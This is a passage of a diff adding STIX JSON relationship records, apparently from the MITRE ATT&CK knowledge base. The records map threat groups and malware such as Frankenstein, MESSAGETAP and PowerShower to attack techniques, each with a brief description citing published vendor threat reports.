+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has uploaded and downloaded files to utilize additional plugins.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--004a3a47-56df-4bb0-a732-c88d4c271937",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.622Z",
+ "created": "2020-05-11T21:30:27.787Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has collected information via [Empire](https://attack.mitre.org/software/S0363), which is automatically sent the data back to the adversary's C2.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--44f65d7f-6f3d-4abe-a3e0-c8209fedbf37",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.735Z",
+ "created": "2020-05-11T21:30:27.790Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has collected information via [Empire](https://attack.mitre.org/software/S0363), which is automatically sent the data back to the adversary's C2.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2e348f62-cc8c-48af-8a5f-d1e5a0fe870b",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.745Z",
+ "created": "2020-05-11T21:30:27.792Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has enumerated hosts, looking to obtain a list of all currently running processes.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--910ed1c2-bba1-422d-b64a-0188e8c57577",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.732Z",
+ "created": "2020-05-11T21:30:27.795Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has enumerated hosts, looking for the system's machine name.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f92333e5-9897-4a79-8e1f-4770867325a9",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.738Z",
+ "created": "2020-05-11T21:30:27.876Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has communicated with a C2 via an encrypted RC4 byte stream and AES-CBC.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7b9a6646-26d6-44ae-8f79-5d31f7c28059",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.740Z",
+ "created": "2020-05-11T21:30:27.879Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has enumerated hosts, gathering username, machine name, and administrative permissions information.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--45fc2c32-6a20-4219-af45-e1d001724c45",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.743Z",
+ "created": "2020-05-11T21:30:27.882Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has enumerated hosts via [Empire](https://attack.mitre.org/software/S0363), gathering various local system information.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--00c0e096-f023-4ccc-8567-d1e8c8494cb5",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.733Z",
+ "created": "2020-05-11T21:30:27.895Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has enumerated hosts via [Empire](https://attack.mitre.org/software/S0363), gathering the username, domain name, machine name, and other system information.(Citation: Talos Frankenstein June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8d4e36fc-65d8-4367-98ed-7e467b9e1f1b",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.796Z",
+ "created": "2020-05-11T21:30:27.899Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has deobfuscated base64-encoded commands following the execution of a malicious script, which revealed a small script designed to obtain an additional payload.(Citation: Talos Frankenstein June 2019) ",
+ "relationship_type": "uses",
+ "id": "relationship--300c5a35-9f3a-4e0d-b04e-bad983ba7136",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.794Z",
+ "created": "2020-05-11T21:30:27.906Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573",
+ "target_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b",
+ "external_references": [
+ {
+ "source_name": "FireEye MESSAGETAP October 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
+ "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[MESSAGETAP](https://attack.mitre.org/software/S0443) has XOR-encrypted and stored contents of SMS messages that matched its target list. (Citation: FireEye MESSAGETAP October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d6ddaace-75b2-4ff0-bb94-751095d6a357",
+ "type": "relationship",
+ "modified": "2020-06-24T01:43:11.278Z",
+ "created": "2020-05-11T22:12:28.655Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573",
+ "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
+ "external_references": [
+ {
+ "source_name": "FireEye MESSAGETAP October 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
+ "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "After loading the keyword and phone data files, [MESSAGETAP](https://attack.mitre.org/software/S0443) begins monitoring all network connections to and from the victim server. (Citation: FireEye MESSAGETAP October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--b565458d-7831-4010-9596-4d6fe44fd738",
+ "type": "relationship",
+ "modified": "2020-06-24T01:43:11.272Z",
+ "created": "2020-05-11T22:12:28.671Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573",
+ "target_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529",
+ "external_references": [
+ {
+ "source_name": "FireEye MESSAGETAP October 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
+ "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[MESSAGETAP](https://attack.mitre.org/software/S0443) uses the libpcap library to listen to all traffic and parses network protocols starting with Ethernet and IP layers. It continues parsing protocol layers including SCTP, SCCP, and TCAP and finally extracts SMS message data and routing metadata. (Citation: FireEye MESSAGETAP October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3318f441-6593-4a7b-bb7f-53ab15a1a672",
+ "type": "relationship",
+ "modified": "2020-06-24T01:43:11.274Z",
+ "created": "2020-05-11T22:12:28.674Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "FireEye MESSAGETAP October 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
+ "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "Once loaded into memory, [MESSAGETAP](https://attack.mitre.org/software/S0443) deletes the keyword_parm.txt and parm.txt configuration files from disk. (Citation: FireEye MESSAGETAP October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1d90e3ef-1839-4bb8-8205-02e2461b5d55",
+ "type": "relationship",
+ "modified": "2020-06-24T01:43:11.334Z",
+ "created": "2020-05-11T22:12:28.676Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573",
+ "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
+ "external_references": [
+ {
+ "source_name": "FireEye MESSAGETAP October 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
+ "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[MESSAGETAP](https://attack.mitre.org/software/S0443) checks two files, keyword_parm.txt and parm.txt, for instructions on how to target and save data parsed and extracted from SMS message data from the network traffic. If an SMS message contained either a phone number, IMSI number, or keyword that matched the predefined list, it is saved to a CSV file for later theft by the threat actor.(Citation: FireEye MESSAGETAP October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f60b8223-eea6-422e-99c6-7f9b70e8ea53",
+ "type": "relationship",
+ "modified": "2020-06-24T01:43:11.357Z",
+ "created": "2020-05-11T22:12:28.689Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "FireEye MESSAGETAP October 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
+ "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "After checking for the existence of two files, keyword_parm.txt and parm.txt, [MESSAGETAP](https://attack.mitre.org/software/S0443) XOR decodes and read the contents of the files. (Citation: FireEye MESSAGETAP October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--97323d60-9623-4b3e-8ff9-50370fef4e5b",
+ "type": "relationship",
+ "modified": "2020-06-24T01:43:11.356Z",
+ "created": "2020-05-11T22:12:28.717Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "FireEye MESSAGETAP October 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
+ "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[MESSAGETAP](https://attack.mitre.org/software/S0443) checks for the existence of two configuration files (keyword_parm.txt and parm.txt) and attempts to read the files every 30 seconds.(Citation: FireEye MESSAGETAP October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f9c13c35-a493-4733-b51c-ab4857692e18",
+ "type": "relationship",
+ "modified": "2020-06-24T01:43:11.336Z",
+ "created": "2020-05-11T22:12:28.735Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8caa18af-4758-4fd3-9600-e8af579e89ed",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[VBShower](https://attack.mitre.org/software/S0442) has the ability to execute VBScript files.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--338371ce-f2c3-4401-9e9a-c4c5667f87cb",
+ "type": "relationship",
+ "modified": "2020-05-12T12:46:57.138Z",
+ "created": "2020-05-12T12:46:57.138Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has used malicious HTA files to drop and execute malware.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--864fdbd1-99fe-4036-a296-241c53337d85",
+ "type": "relationship",
+ "modified": "2020-05-12T12:49:52.904Z",
+ "created": "2020-05-12T12:49:52.904Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573",
+ "external_references": [
+ {
+ "source_name": "FireEye MESSAGETAP October 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
+ "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "(Citation: FireEye MESSAGETAP October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--95a4d32c-7705-4527-abd8-9d2aca70dbc0",
+ "type": "relationship",
+ "modified": "2020-06-24T01:43:11.354Z",
+ "created": "2020-05-12T14:07:23.123Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has the ability to remove all files created during the dropper process.(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--38938464-b328-4d89-a3a3-7e1f68cb195e",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:44.234Z",
+ "created": "2020-05-12T14:12:19.673Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has added a registry key so future powershell.exe instances are spawned with coordinates for a window position off-screen by default.(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--dca41ced-2af1-4cec-8ed2-a1c77bc535ed",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:44.236Z",
+ "created": "2020-05-12T14:12:19.680Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has used a PowerShell document stealer module to pack and exfiltrate .txt, .pdf, .xls or .doc files smaller than 5MB that were modified during the past two days.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8b02b838-22f8-469b-97f1-7185b06d286a",
+ "type": "relationship",
+ "modified": "2020-05-12T14:12:19.697Z",
+ "created": "2020-05-12T14:12:19.697Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has used 7Zip to compress .txt, .pdf, .xls or .doc files prior to exfiltration.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--dd82b9d7-d60c-4dc0-97d7-244a1365a1e9",
+ "type": "relationship",
+ "modified": "2020-05-12T20:33:57.737Z",
+ "created": "2020-05-12T14:12:19.716Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has the ability to deploy a reconnaissance module to retrieve a list of the active processes.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--45098d46-2345-4fe4-8b07-2345ffbb9e60",
+ "type": "relationship",
+ "modified": "2020-05-12T14:26:05.003Z",
+ "created": "2020-05-12T14:26:05.003Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has the ability to encode C2 communications with base64 encoding.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--98b19c5d-efbc-4e00-b7cc-71df5a1109e0",
+ "type": "relationship",
+ "modified": "2020-05-20T20:43:50.223Z",
+ "created": "2020-05-12T14:26:05.035Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fc19dd7e-415d-4e27-92bd-262392b6d38f",
+ "type": "relationship",
+ "modified": "2020-05-12T18:25:44.512Z",
+ "created": "2020-05-12T18:25:44.512Z"
+ },
+ {
